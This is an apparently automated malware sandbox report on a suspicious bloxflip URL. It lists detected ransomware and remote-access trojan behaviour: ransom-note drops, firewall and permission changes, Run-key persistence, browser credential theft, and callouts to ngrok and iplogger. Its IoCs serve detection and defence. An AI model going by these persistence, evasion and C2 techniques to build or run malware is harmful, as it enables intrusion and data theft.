chimera | hxxps://bloxflip[.]com/a/kriszti

Analysis

max time kernel
705s
max time network
821s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05-10-2024 15:47

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://bloxflip.com/a/kriszti

Score

10^/10

chimera revengerat rms agilenet defense_evasion discovery evasion execution persistence ransomware rat rezer0 spyware stealer trojan upx

Malware Config

Signatures

Chimera 64 IoCs

Ransomware which infects local and network files, often distributed via Dropbox links.

ransomware chimera

Processes:

AnyDesk.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

ReZer0 packer 1 IoCs

Detects ReZer0, a packer with multiple versions used in various campaigns.

rezer0

Processes:

resource	yara_rule
behavioral1/memory/11332-56853-0x0000000005D10000-0x0000000005D38000-memory.dmp	rezer0

Renames multiple (3316) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

RevengeRat Executable 1 IoCs

stealer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	revengerat

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 22 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
6860	netsh.exe
14340	netsh.exe
9424	netsh.exe
17476	netsh.exe
16348	netsh.exe
17800	netsh.exe
14200	netsh.exe
7744	netsh.exe
19492	netsh.exe
15928	netsh.exe
10768	netsh.exe
5228	netsh.exe
17820	netsh.exe
14652	netsh.exe
19616	netsh.exe
7452	netsh.exe
16756	netsh.exe
8544	netsh.exe
9268	netsh.exe
7840	netsh.exe
17864	netsh.exe
10616	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AnyDesk.exeAnyDesk.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	AnyDesk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	AnyDesk.exe

Executes dropped EXE 9 IoCs

Processes:

AnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exebutterflyondesktop.tmpButterflyOnDesktop.exeWIN2CC7.pif

pid	process
2008	AnyDesk.exe
4420	AnyDesk.exe
4724	AnyDesk.exe
3404	AnyDesk.exe
2172	AnyDesk.exe
2928	AnyDesk.exe
1440	butterflyondesktop.tmp
5064	ButterflyOnDesktop.exe
3464	WIN2CC7.pif

Loads dropped DLL 2 IoCs

Processes:

AnyDesk.exeAnyDesk.exe

pid process

2172 AnyDesk.exe
3404 AnyDesk.exe

pid	process
2172	AnyDesk.exe
3404	AnyDesk.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
11160	icacls.exe
17356	icacls.exe
11956	icacls.exe
6308	icacls.exe
5020	icacls.exe
14992	icacls.exe
18380	icacls.exe
15320	icacls.exe
13988	icacls.exe
2488	icacls.exe
19232	icacls.exe
20208	icacls.exe
16496	icacls.exe
10012	icacls.exe
4368	icacls.exe
14712	icacls.exe
11336	icacls.exe
3580	icacls.exe
8460	icacls.exe
6260	icacls.exe
9376	icacls.exe
15768	icacls.exe
8308	icacls.exe
13120	icacls.exe
17704	icacls.exe
14216	icacls.exe
16980	icacls.exe
14596	icacls.exe
6692	icacls.exe
16552	icacls.exe
6156	icacls.exe
2900	icacls.exe
14028	icacls.exe
15996	icacls.exe
9528	icacls.exe
10260	icacls.exe
8508	icacls.exe
19240	icacls.exe
17184	icacls.exe
12824	icacls.exe
6820	icacls.exe
9064	icacls.exe
11808	icacls.exe
7528	icacls.exe
15788	icacls.exe
9312	icacls.exe
14592	icacls.exe
16664	icacls.exe
14552	icacls.exe
12348	icacls.exe
20404	icacls.exe
17552	icacls.exe
9796	icacls.exe
12200	icacls.exe
15496	icacls.exe
13372	icacls.exe
15568	icacls.exe
20112	icacls.exe
11852	icacls.exe
9264	icacls.exe
12096	icacls.exe
13648	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/6264-34560-0x0000000002D20000-0x0000000002D34000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

butterflyondesktop.tmpWinevar.exeWIN2CC7.pif

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop	butterflyondesktop.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Email-Worm\\Winevar.exe"	Winevar.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Email-Worm\\Winevar.exe"	Winevar.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WIN2CC7 = "C:\\Windows\\system32\\WIN2CC7.pif"	WIN2CC7.pif
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN2CC7 = "C:\\Windows\\system32\\WIN2CC7.pif"	WIN2CC7.pif

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

15184 powershell.exe

pid	process
15184	powershell.exe

Drops desktop.ini file(s) 27 IoCs

Processes:

AnyDesk.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	AnyDesk.exe
File opened for modification	C:\Program Files\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	AnyDesk.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

535 0.tcp.ngrok.io
466 0.tcp.ngrok.io
500 iplogger.org
501 iplogger.org
509 0.tcp.ngrok.io
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

408 bot.whatismyipaddress.com
System Binary Proxy Execution: Verclsid 1 TTPs 3 IoCs
Adversaries may abuse Verclsid to proxy execution of malicious code.
defense_evasion

Verclsid
T1218.012

Processes:

verclsid.exeverclsid.exeverclsid.exe

pid process

18660 verclsid.exe
12932 verclsid.exe
3408 verclsid.exe

flow	ioc
535	0.tcp.ngrok.io
466	0.tcp.ngrok.io
500	iplogger.org
501	iplogger.org
509	0.tcp.ngrok.io

flow	ioc
408	bot.whatismyipaddress.com

pid	process
18660	verclsid.exe
12932	verclsid.exe
3408	verclsid.exe

AutoIT Executable 5 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\ProgramData\Windows\winit.exe	autoit_exe
C:\ProgramData\Microsoft\Intel\taskhost.exe	autoit_exe
behavioral1/memory/2492-108636-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	autoit_exe
behavioral1/memory/2492-118029-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	autoit_exe
behavioral1/memory/2492-134886-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	autoit_exe

Drops file in System32 directory 22 IoCs

Processes:

Maldal.a.exeAnyDesk.exeWIN2CC7.pifWinevar.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\DALLAH.exe	Maldal.a.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\WIN33AF.tmp	WIN2CC7.pif
File opened for modification	C:\Windows\SysWOW64\WIN2CC7.pif	Winevar.exe
File opened for modification	C:\Windows\SysWOW64\WIN2CF6.tmp	WIN2CC7.pif
File opened for modification	C:\Windows\SysWOW64\WIN337F.tmp	WIN2CC7.pif
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	AnyDesk.exe
File created	C:\Windows\SysWOW64\DALLAH.exe	Maldal.a.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	AnyDesk.exe
File created	C:\Windows\SysWOW64\WIN2CC7.pif	Winevar.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\Intel\winlogon.exe	upx
behavioral1/memory/14772-89601-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/14772-105138-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/2492-108636-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	upx
behavioral1/memory/10728-110468-0x0000000000400000-0x0000000000454000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\aut5876.tmp	upx
behavioral1/memory/7008-113360-0x0000000000400000-0x0000000000409000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\DB.EXE	upx
C:\Users\Admin\AppData\Local\Temp\EN.EXE	upx
behavioral1/memory/18384-118030-0x0000000000400000-0x000000000040A000-memory.dmp	upx
behavioral1/memory/2492-118029-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	upx
behavioral1/memory/12460-117164-0x0000000000400000-0x0000000000445000-memory.dmp	upx
behavioral1/memory/2492-134886-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	upx
behavioral1/memory/14772-135140-0x0000000000400000-0x0000000000419000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

Processes:

AnyDesk.exe

description	ioc	process
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarBadge.scale-150.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalMedTile.scale-200_contrast-black.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_MouseNose.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionSmallTile.scale-200.png	AnyDesk.exe
